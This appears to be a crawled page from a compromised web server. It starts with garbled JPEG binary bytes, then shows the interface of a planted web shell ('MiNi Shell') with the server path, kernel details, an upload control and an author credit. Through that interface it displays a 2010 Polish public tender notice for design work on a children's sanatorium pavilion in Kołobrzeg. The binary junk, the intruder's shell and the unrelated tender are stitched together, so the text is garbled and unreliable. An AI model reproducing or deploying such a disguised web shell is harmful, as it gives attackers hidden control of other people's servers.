JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100107/5502-N-2010.html

<p class="kh_header"><b>Kołobrzeg: Wykonanie projektu wielobranżowego wraz z kompletem kosztorysów, specyfikacją techniczną wykonania i odbioru robót dla zadania pn. Przebudowa pawilonu I Dziecięcego Szpitala Uzdrowiskowego SŁONECZKO w Kołobrzegu.</b><br>
<b>Numer ogłoszenia: 5502 - 2010; data zamieszczenia: 07.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Kołobrzeg Spółka Akcyjna , ks. Piotra Ściegiennego 1, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3548802, faks 0-94 35 225 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu wielobranżowego wraz z kompletem kosztorysów, specyfikacją techniczną wykonania i odbioru robót dla zadania pn. Przebudowa pawilonu I Dziecięcego Szpitala Uzdrowiskowego SŁONECZKO w Kołobrzegu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie wielobranżowego projektu budowlanego, będącego jednocześnie projektem wykonawczym  oraz  kompletu  kosztorysów  inwestorskich i nakładczych dla zadania, polegającego na  Przebudowie pawilonu I Dziecięcego Szpitala Uzdrowiskowego SŁONECZKO w Kołobrzegu  w zakresie:
          - wykonanie nowej elewacji z dociepleniem,
          - wymiana stropów drewnianych na żelbetowe,
          - dobudowa  szybu windowego,
          - dobudowa sanitariatów,
          - wymiana podłóg,
          - wykonanie nowych tynków,           
          - wymiana instalacji wod.kan., c.o., elektrycznych, teleinformatycznych, oświetlenia 
            ewakuacyjnego, p.poż.
 - wykonanie nowego pokrycia dachowego

2. Opracowanie powinno zawierać projekty w następujących branżach :    
- projekt architektoniczno - budowlany
- projekt konstrukcyjny
- projekt instalacji wod.kan. i c.o.
- projekt instalacji wentylacji mechanicznej
- projekt instalacji elektrycznych
- projekt instalacji teleinformatycznych
- projekt instalacji p.poż. i oświetlenia ewakuacyjnego
- projekt kolorystyki elewacji 
- projekt  aranżacji  wnętrz
- projekt zagospodarowania terenu (  plac w obrębie ogrodzenia , zieleń, oświetlenie )

3. Opracowanie musi  uwzględniać zapisy zamieszczone w rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (DZ.U. z dnia 16 września 2004 r., nr 202, poz. 2072  wraz ze zmianami zawartymi w Rozporządzeniu Ministra  Infrastruktury z dnia 6 listopada 2008 r.) oraz  zawierać :
a) projekt  budowlany  wraz  z  niezbędnymi  uzgodnieniami  umożliwiającymi uzyskanie pozwolenia na budowę , opracowany zgodnie z przepisami Prawa budowlanego i spełniający wymagania  rozporządzenia  Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2003 r. nr 120, poz. 1133 ze zmianami z dnia 6.11.2008 r.)
- w liczbie 6 egzemplarzy
b) projekty wykonawcze w zakresie , o którym mowa w § 5 ww. rozporządzenia - w liczbie 6 egzemplarzy
c) specyfikację techniczną wykonania i odbioru robót budowlanych , przez którą należy rozumieć  opracowania  zawierające w szczególności  zbiory  wymagań , które są niezbędne do  określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych , właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót.
Specyfikacje muszą  uwzględniać wymagania określone w §13 i 14 ww. rozporządzenia - w liczbie 6 egzemplarzy.
d) przedmiary robót , przez które należy rozumieć opracowania zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej  ich  wykonania  wraz  z ich szczegółowym opisem   , miejscem  wykonania  lub wskazaniem podstaw ustalających szczegółowy opis , z wyliczeniem i zestawieniem liczby jednostek miar robót podstawowych  oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych .
Przedmiary muszą uwzględniać wymagania określone w § od 6 do 10 ww. rozporządzenia - w liczbie 6 egzemplarzy.
e) kosztorys inwestorski opracowany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz.U. z 2004 r., nr  130, poz. 1389  z późniejszymi zmianami) - w 1 egzemplarzu
 
Kompletne opracowania projektowe powinny zostać dostarczone do Zamawiającego  zarówno w formie elektronicznej jak i   w formie dokumentacji  papierowej. 

4.	Planowany zakres przebudowy znajduje się w załączniku nr 1 do  SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 71.32.11.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wykonawcy, którzy złożą ofertę oraz złożą oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także inne wymienione w dalszej części specyfikacji dokumenty oraz którzy nie podlegają wykluczeniu z postępowania o zamówienie publiczne z przyczyn, o których mowa w art. 24 uPzp.
2. Oferentem może być osoba fizyczna, osoba prawna lub jednostka organizacyjna nie posiadająca osobowości prawnej oraz podmioty te występujące wspólnie. Oferenci występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.
3.Wykonawca winien być uprawniony do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi i prowadzić działalność o charakterze zbieżnym z niniejszym zamówieniem.
4. Wykonawca powinien posiadać doświadczenie w wykonywaniu tego typu projektów w użyteczności publicznej. Miarą tego doświadczenia będzie wykonanie z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, co najmniej  dwóch takich zadań, potwierdzonych pozytywnymi referencjami. Komisja przeprowadzi weryfikację dostarczonych dokumentów, dlatego prosimy o podanie nazwy wykonanego zadania, wartości netto i brutto, adresu i numeru telefonu Zamawiającego.
5. Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.
6. Wymagane jest określenie przez wykonawcę telefonów kontaktowych i numerów faksu oraz przyjęcie innych ustaleń określonych w dokumentacji przetargowej niezbędnych dla sprawnego i terminowego wykonania zamówienia.
7. W przypadku wykonawców wspólnie ubiegających się zamówienie żaden z współpartnerów nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy; warunki określone w art. 22 ust. 1 ustawy musi spełniać przynajmniej jeden z wykonawców lub wszyscy wykonawcy łącznie.
8. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o zamówienie publiczne. 
9. Koszty związane z przygotowaniem i złożeniem oferty ponosi wykonawca (oferent).

Ocena warunków wymaganych od oferentów zostanie dokonana według formuły spełnia - nie spełnia. Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert.

2. Oświadczenie oferenta, że spełnia warunki określone w art. 22 i nie podlega wykluczeniu z postępowania z przyczyn wymienionych w art. 24 ust.1 ustawy  Prawo zamówień publicznych złożone na załączonym do specyfikacji druku.

3. Wykaz wykonanych (co najmniej dwóch) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres działalności Wykonawcy był krótszy, to w okresie działalności, projektów obiektów użyteczności publicznej z podaniem: 	nazwy, adresu siedziby i numeru telefonu inwestora, wartości umownej wykonanych projektów.
Ponadto, do wykazu należy  dołączyć referencje (opinie) wystawione przez zleceniodawców  robót, minimum dwie.
Komisja przeprowadzi weryfikację dostarczonych dokumentów, dlatego prosimy o podanie nazwy wykonanego zadania, wartości netto i brutto, terminu wykonania projektu, adresu i numeru telefonu Zamawiającego.
4. Wykaz imienny osób, którzy będą pełnić funkcje projektantów oraz kopie uprawnień budowlanych projektantów, w zakresach odpowiadających przedmiotowi zamówienia.
5. Zaświadczenia z właściwej izby samorządu zawodowego dla osób, które będą pełnić funkcje projektanta, potwierdzające ich przynależność do izby oraz posiadanie wymaganego ubezpieczenia od odpowiedzialności cywilnej na dzień składania ofert lub innego dokumentu, z którego wynika przynależność do ww. izby i posiadanie ubezpieczenia.

6. Podmioty występujące wspólnie dołączają do oferty dokumenty i oświadczenia wymienione w punkcie 1 i 2  oddzielnie za każdy podmiot, a ponadto pełnomocnictwo dla osoby reprezentującej wspólników..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko.kolobrzeg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Kołobrzeg S.A.
ul. Ściegiennego 1
78-100 Kołobrzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2010 godzina 10:00, miejsce: Uzdrowisko Kołobrzeg S.A.
ul. Ściegiennego 1
78-100 Kołobrzeg.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com